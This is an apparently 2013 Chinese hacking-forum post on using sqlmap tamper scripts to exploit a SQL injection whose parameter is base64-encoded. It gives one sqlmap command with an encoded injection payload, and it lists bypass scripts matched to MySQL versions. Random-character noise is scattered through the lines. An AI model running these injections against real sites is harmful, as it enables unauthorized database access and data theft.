找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2283|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?0 K9 f7 r1 }7 i* T
* O, \. B. w1 N8 l3 w* U/ B. G
sqlmap的tamper里有个base64encode.py5 L7 l2 P' w; i: \9 B

8 d" K  n$ X; K6 V6 l- J使用如下
3 }2 c8 v( S% v: ]) F% d+ I/ E3 {' P& N8 s& Y1 b. j, y- y
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs3 M1 l7 i4 b; J" H$ @

% w2 W+ {1 n6 i  L# s: l
" w6 H# F9 M* u8 z  R8 Nsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”! {. \- P5 S) S) J" K+ J

' A3 ?6 L4 k2 b; ?8 M( K3 A& y1 m其中常用到的bypass脚本绕过SQLMAP主要两个脚本:8 }1 G8 v' f) m2 R3 L
9 y  F2 L" b0 T# q
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入/ F6 v- H8 M9 M3 [9 z
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入* O# R% e/ m% U
首先确定目标数据库版本,然后选择相应的脚本。
% S: ]1 o3 `5 C, |7 N* H-v 3 --batch --tamper "space2hash.py"* p3 \7 U$ z$ s

/ x: U. Q1 I5 I& w3 ?4 P  C还有其他一些插件:
" g$ `& V0 O8 p  |" h6 k& _encodes编码 ——charencode.py
. [" ~5 v  o5 [& U- V, w' wbase64编码 —— base64encode.py
, O) G1 A5 r4 T% f  M6 X+ `# y* @( y替换空格和关键字 —— halfversionedmorekeywords.py, }0 P1 j; T* t2 |( S

0 g" ~1 Q- O/ J1 e* z
+ Z% i. c  ?7 q( U) E$ x9 ]5 u; ]5 a$ Y0 y6 M+ E" k) t
4 f& L. T: P* q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表